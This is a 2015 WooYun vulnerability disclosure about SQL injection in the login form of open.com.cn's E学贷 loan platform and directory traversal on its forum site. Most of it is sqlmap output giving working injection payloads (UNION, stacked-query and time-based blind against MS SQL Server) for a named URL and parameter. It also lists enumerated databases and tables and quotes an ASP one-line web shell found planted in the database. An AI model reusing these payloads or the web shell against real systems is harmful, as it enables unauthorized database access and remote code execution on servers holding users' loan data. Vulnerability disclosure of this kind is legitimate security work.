当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133116

漏洞标题:奥鹏教育两分站漏洞集合

相关厂商:open.com.cn

漏洞作者: 路人甲

提交时间:2015-08-10 16:42

修复时间:2015-08-20 11:27

公开时间:2015-08-20 11:27

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-11: 厂商已经确认,细节仅向厂商公开
2015-08-20: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

注入+目录遍历

详细说明:

1.SQL注入
E学贷管理平台
http://credit.open.com.cn/Home/LoginSubmit
data="jizhu=0&loginname=-1&password="

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: loginname
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: jizhu=0&loginname=-1' UNION ALL SELECT CHAR(113)+CHAR(111)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(69)+CHAR(120)+CHAR(89)+CHAR(110)+CHAR(88)+CHAR(104)+CHAR(84)+CHAR(114)+CHAR(71)+CHAR(117)+CHAR(113)+CHAR(120)+CHAR(103)+CHAR(108)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: jizhu=0&loginname=-1'; WAITFOR DELAY '0:0:5'--&password=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: jizhu=0&loginname=-1' WAITFOR DELAY '0:0:5'--&password=
---
[03:31:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [5]:                                             
[*] E_Loan
[*] master
[*] model
[*] msdb
[*] tempdb


Database: E_Loan                                                     
[52 tables]
+---------------------------+
| 2015过年活动人员名单                      |
| Dic_Activity_Type         |
| Dic_Bank                  |
| Dic_CompanyScale          |
| Dic_CompanyType           |
| Dic_Connect_Type          |
| Dic_Default_Rule          |
| Dic_DutyType              |
| Dic_EducationalStatus     |
| Dic_FileBusiness_Type     |
| Dic_MaritalStatus         |
| Dic_Repay_Type            |
| Dic_WorkYear              |
| TBL_Activity_Group        |
| TBL_Activity_Group        |
| TBL_Actvity_User          |
| TBL_Audit_Reason          |
| TBL_Client_His            |
| TBL_Client_His            |
| TBL_Connect_Man_His       |
| TBL_Connect_Man_His       |
| TBL_Loan_Connect_Man_His  |
| TBL_Loan_Connect_Man_His  |
| TBL_Loan_EarlyRepay_His   |
| TBL_Loan_EarlyRepay_His   |
| TBL_Loan_File_Relevance   |
| TBL_Loan_File_Relevance   |
| TBL_Loan_FromCompany      |
| TBL_Loan_Instalment_His   |
| TBL_Loan_Instalment_His   |
| TBL_Loan_Instalment_Input |
| TBL_Loan_Product          |
| TBL_Loan_Rate             |
| TBL_Loan_Record_His       |
| TBL_Loan_Record_His       |
| TBL_Loan_Record_Sequence  |
| TBL_Loan_ToCompany        |
| TBL_Login_Type            |
| TBL_Menu_Url              |
| TBL_Menu_Url              |
| TBL_Notice_TiggerType     |
| TBL_Notice_TiggerType     |
| TBL_Notice_Type           |
| TBL_Phone_ValidCode       |
| TBL_Repay_Date            |
| TBL_Role_Menu             |
| TBL_Role_Menu             |
| TBL_User_Menu             |
| TBL_User_Menu             |
| TBL_User_Role             |
| cmd                       |
| sqlmapoutput              |
+---------------------------+


数据库被写入一句话木马,哦哦!!!

Database: E_Loan
Table: cmd
[1 entry]
+-------------------------+
| a                       |
+-------------------------+
| <%eval request("yun")%> |
+-------------------------+


2.目录遍历
奥鹏远程教育公共服务体系高峰论坛
http://forum.open.com.cn

I~@@EAPU4])`)~J0Y2L}6R1.png


J2NSP~{DYS~IYR8{H4[H~}A.jpg


看看都被干了什么吧!

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-08-11 15:01

厂商回复:

已通知相关人员处理

最新状态:

2015-08-20:E学贷漏洞已修复forum站点已下线

漏洞评价:

评论

  1. 2015-08-20 12:50 | Elliott ( 实习白帽子 | Rank:40 漏洞数:9 | 绝逼不当程序员)

    额,工具留下的 -_-